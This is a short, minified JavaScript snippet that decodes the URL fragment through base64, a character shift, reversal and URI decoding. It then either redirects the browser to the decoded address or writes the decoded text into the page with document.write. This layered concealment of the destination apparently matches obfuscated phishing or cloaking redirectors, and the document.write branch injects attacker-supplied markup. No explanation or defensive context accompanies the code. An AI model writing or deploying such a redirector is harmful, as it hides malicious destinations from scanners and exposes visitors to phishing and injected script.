!function(){ function e(e){ return decodeURIComponent(Array.prototype.map.call(atob(e), function(e){ return "%" + ("00" + e.charCodeAt(0).toString(16)).slice(-2) }).join("")); } function n(e){ return String.fromCharCode(...e.split("").map(e => e.charCodeAt(0) - 1)); } function t(e){ return e.split("").reverse().join(""); } function o(e){ try{ return new URL(e), true; } catch { return false; } } var r = window.location.hash.substring(1); if (r) { var c = r; var i = e(c); var l = n(i); var a = t(l); var u = decodeURIComponent(a); if (o(u)) { window.location.replace(u); } else { document.write(u); } } else { window.location.replace(atob("")); } }();